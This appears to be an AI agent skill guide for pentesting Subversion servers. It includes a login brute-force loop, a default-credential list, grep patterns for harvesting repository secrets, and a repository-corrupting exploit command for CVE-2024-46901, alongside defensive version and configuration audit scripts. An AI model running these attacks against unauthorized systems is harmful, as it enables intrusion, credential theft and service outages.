Hacktricks-skills svn-pentest

Pentest Subversion (SVN) servers on port 3690. Use this skill whenever you need to enumerate, exploit, or assess SVN repositories - whether you see port 3690 open, find svn:// or svn+ssh:// URLs, discover mod_dav_svn over HTTP(S), or need to extract credentials from version control systems. This skill covers anonymous access testing, credential brute-forcing, CVE exploitation (CVE-2024-46901, CVE-2024-45720), and secret extraction from repos.

Install (clone the upstream repo):
git clone https://github.com/abelrguezr/hacktricks-skills
Manifest: skills/network-services-pentesting/3690-pentesting-subversion-svn-server/SKILL.MD

SVN Server Pentesting

This skill helps you assess Subversion (SVN) servers for security vulnerabilities, misconfigurations, and exposed secrets.

When to Use This Skill

  • Port 3690/tcp is open (svnserve)
  • You find svn://, svn+ssh://, or http(s)://.../svn/ URLs
  • You discover mod_dav_svn serving repositories over HTTP/HTTPS
  • You need to enumerate version control systems for secrets, credentials, or misconfigurations
  • You're assessing Subversion versions for known CVEs

Quick Start

# Check if SVN is running
nc -vn <target> 3690

# Try anonymous access
svn ls svn://<target>
svn ls -R svn://<target>/repo

# If over HTTP(S)
svn ls https://<target>/svn/repo --username guest --password ''

Enumeration Workflow

1. Identify Access Method

Determine how the SVN server is exposed:

| Method | URL Format | Port |
|---|---|---|
| svnserve | svn://<host> | 3690 |
| mod_dav_svn | http(s)://<host>/svn/ | 80/443 |
| svn+ssh | svn+ssh://<host> | 22 |

2. Banner Grabbing

# Connect to port 3690
nc -vn <target> 3690

# Check client version (may leak via errors)
svn --version

# If you have shell access
svnserve --version

3. Anonymous Access Testing

Try to list and checkout without credentials:

# List root directory
svn ls svn://<target>

# Recursive listing
svn ls -R svn://<target>/repo

# Get repository metadata
svn info svn://<target>/repo

# View commit history
svn log svn://<target>/repo

# Full checkout (may expose secrets)
svn checkout svn://<target>/repo

4. Extract Revision Properties

Revision properties often contain build credentials, URLs, and tokens:

# Get commit messages (may contain sensitive info)
svn propget --revprop -r HEAD svn:log svn://<target>/repo

# Get other revision properties (author, date)
svn propget --revprop -r HEAD svn:author svn://<target>/repo
svn propget --revprop -r HEAD svn:date svn://<target>/repo

5. Check for svn:externals

After checkout, check for external dependencies that may point to other hosts:

svn propget svn:externals -R .

Authentication Testing

Common Credentials to Try

  • admin:admin, admin:password, admin:123456
  • svn:svn, user:user, guest:guest
  • ci:ci, dev:dev, build:build
  • Reuse credentials found elsewhere in the engagement

Brute-Force Script

Use the bundled script for credential spraying:

./scripts/bruteforce_svn.sh <target> <repo> <userlist> <passlist>

Or manually:

for u in admin dev ci; do
  for p in $(cat /tmp/passlist); do
    svn ls --username "$u" --password "$p" svn://<target>/repo 2>/dev/null && echo "[+] $u:$p" && break
  done
done

Secret Extraction

After successful checkout, search for sensitive data:

# Search for credentials
grep -R "password\|secret\|token\|api_key\|aws_access" -n .

# Search for private keys
grep -R "BEGIN.*PRIVATE" -n .

# Search for database configs
grep -R "mysql://\|postgres://\|mongodb://" -n .

# Check common secret locations
find . -name "*.env" -o -name "*.config" -o -name "*.conf" -o -name "credentials*"

CVE Exploitation

CVE-2024-46901: mod_dav_svn DoS via Control Characters

Affects: Subversion ≤ 1.14.4 when served through HTTP(S) (mod_dav_svn)

Impact: Repository corruption, service crash

Prerequisites: Valid commit credentials

Exploitation:

# Create payload
printf 'pwn' > /tmp/payload

# Commit path with control character (requires commit access)
svnmucc -m "DoS" put /tmp/payload $'http://<target>/svn/repo/trunk/bad\x01path.txt'

Detection: Check Apache response headers for Subversion version:

curl -I https://<target>/svn/repo | grep -i subversion

CVE-2024-45720: Windows Argument Injection

Affects: Subversion ≤ 1.14.3 on Windows only

Impact: Arbitrary command execution via crafted paths

Attack Vector: Social engineering - trick a Windows developer into running svn on an attacker-controlled path

Example:

# Create malicious path with best-fit encoding bytes
# Path decodes to: " & calc.exe & " style injection
# Requires victim to run: svn status <malicious-path>

Note: This requires victim interaction - not directly exploitable remotely.

Advanced Techniques

Hook Script Analysis

If you obtain filesystem access to the repository:

# Check for hook scripts
ls -la hooks/

# Analyze pre-commit/post-commit hooks
cat hooks/pre-commit
cat hooks/post-commit

# Hooks may contain plaintext credentials or hostnames

Offline Repository Analysis

With filesystem access to .svn directories:

# Dump repository contents
svnadmin dump /path/to/repo

# View authors
svnlook author /path/to/repo

# View changed directories
svnlook dirs-changed /path/to/repo

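# View file contents at specific revision (svnlook's subcommand is "cat";
# the repository path and the in-repo file path are separate arguments)
svnlook cat -r <revision> /path/to/repo path/to/file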

Version Leaks

HTTP response headers often reveal Subversion and Apache versions:

curl -I https://<target>/svn/repo
# Look for: DAV: 1/1, 2/1, SVN version headers

Compare against 1.14.5 to identify vulnerable targets.
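
The comparison above, written out as a patch-triage helper. This is an added example, not the skill's check_svn_version.sh; it assumes the version shows up as an SVN/x.y.z token in the Server header and that a (Win32)/(Win64) token marks a Windows host. Function names and sample headers are constructed.

```shell
#!/bin/sh
# Added example, not one of the skill's bundled scripts.

# Print the x.y.z that follows an "SVN/" token in a header line (empty if none).
svn_version_from_header() {
  printf '%s\n' "$1" |
    sed -n 's|.*SVN/\([0-9][0-9]*\.[0-9][0-9]*\.[0-9][0-9]*\).*|\1|p'
}

# Succeed when version $1 <= version $2. Components are compared numerically,
# because a string compare would rank 1.9.7 above 1.14.4.
version_le() {
  old_ifs=$IFS; IFS=.
  set -- $1 $2                      # a.b.c x.y.z -> $1..$6
  IFS=$old_ifs
  if [ "$1" -lt "$4" ]; then return 0; elif [ "$1" -gt "$4" ]; then return 1; fi
  if [ "$2" -lt "$5" ]; then return 0; elif [ "$2" -gt "$5" ]; then return 1; fi
  [ "$3" -le "$6" ]
}

# Print the CVEs from this page whose affected range contains the header's
# version: "none" if patched, "unknown" if no SVN/ token is present.
cves_for_header() {
  v=$(svn_version_from_header "$1")
  if [ -z "$v" ]; then echo unknown; return 0; fi
  out=""
  # An SVN/ token in the Server header implies mod_dav_svn (<= 1.14.4 affected).
  if version_le "$v" 1.14.4; then out="CVE-2024-46901"; fi
  case "$1" in
    *"(Win32)"*|*"(Win64)"*)        # Windows only, <= 1.14.3 affected
      if version_le "$v" 1.14.3; then out="$out CVE-2024-45720"; fi ;;
  esac
  echo "${out:-none}"
}

# Constructed sample headers (not captured from a real host).
for h in \
  'Server: Apache/2.4.58 (Ubuntu) SVN/1.14.3' \
  'Server: Apache/2.4.58 (Win64) SVN/1.14.3' \
  'Server: Apache/2.2.22 (Ubuntu) DAV/2 SVN/1.9.7' \
  'Server: Apache/2.4.62 (Debian) SVN/1.14.5' \
  'Server: Apache'
do
  printf '%-48s -> %s\n' "$h" "$(cves_for_header "$h")"
done
```

A missing SVN/ token only means the header was trimmed (for example by ServerTokens), so "unknown" is not the same as patched.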

Common Misconfigurations

  1. Anonymous read access: anon-access = read in svnserve.conf
  2. Anonymous write access: anon-access = write (critical)
  3. Weak authentication: Simple password files without lockout
  4. Exposed hooks: Pre-commit/post-commit scripts with credentials
  5. Unrestricted svn+ssh: User shells allowing restricted svnserve commands
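
An audit of items 1 to 3 for administrators reviewing their own svnserve.conf. This is an added example, not one of the skill's scripts; the function names, finding strings and sample configs are constructed. It relies on svnserve defaulting to anon-access = read when the key is unset or commented out.

```shell
#!/bin/sh
# Added example, not one of the skill's bundled scripts.

# conf_get FILE SECTION KEY: print the value of KEY inside [SECTION]; empty if unset.
conf_get() {
  awk -v want="[$2]" -v key="$3" '
    /^#/  { next }                                   # commented-out template lines
    /^\[/ { section = $0; sub(/[ \t\r]+$/, "", section); next }
    section == want && index($0, "=") {
      k = substr($0, 1, index($0, "=") - 1)
      v = substr($0, index($0, "=") + 1)
      gsub(/^[ \t]+|[ \t\r]+$/, "", k); gsub(/^[ \t]+|[ \t\r]+$/, "", v)
      if (k == key) val = v
    }
    END { print val }' "$1"
}

# audit_svnserve_conf FILE: print one finding per line.
audit_svnserve_conf() {
  anon=$(conf_get "$1" general anon-access)
  case "${anon:-read}" in           # unset key means the default, read
    write) echo "CRITICAL anon-access=write" ;;
    read)  echo "WARN anon-access=read" ;;
    none)  echo "OK anon-access=none" ;;
    *)     echo "UNKNOWN anon-access=$anon" ;;
  esac
  if [ -n "$(conf_get "$1" general password-db)" ]; then
    echo "WARN password-db: simple password file"
  fi
}

# Constructed sample configs: weak, template defaults (keys commented), tightened.
tmp=$(mktemp -d)
printf '[general]\nanon-access = write\npassword-db = passwd\n' > "$tmp/weak.conf"
printf '[general]\n# anon-access = read\n# auth-access = write\n' > "$tmp/default.conf"
printf '[general]\nanon-access = none\nauth-access = write\n[sasl]\nuse-sasl = true\n' > "$tmp/tight.conf"
for f in weak default tight; do
  echo "== $f.conf"
  audit_svnserve_conf "$tmp/$f.conf"
done
rm -rf "$tmp"
```

The default.conf case is the one that gets missed in reviews: a file with every key commented out still grants anonymous read.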

Output Format

When documenting findings, use this structure:

## SVN Assessment Results

### Target
- Host: <target>
- Port: 3690/tcp
- Access Method: svnserve/mod_dav_svn/svn+ssh

### Version
- Subversion: <version>
- Vulnerable to CVEs: <list or "None identified">

### Access Status
- Anonymous: <allowed/denied>
- Authenticated: <credentials found or "Not tested">

### Secrets Found
- <list of sensitive files/credentials discovered>

### Recommendations
- <remediation steps>

Scripts

This skill includes helper scripts:

  • scripts/enumerate_svn.sh - Automated enumeration of SVN repositories
  • scripts/bruteforce_svn.sh - Credential brute-forcing against SVN servers
  • scripts/check_svn_version.sh - Version detection and CVE matching

Run with --help for usage details.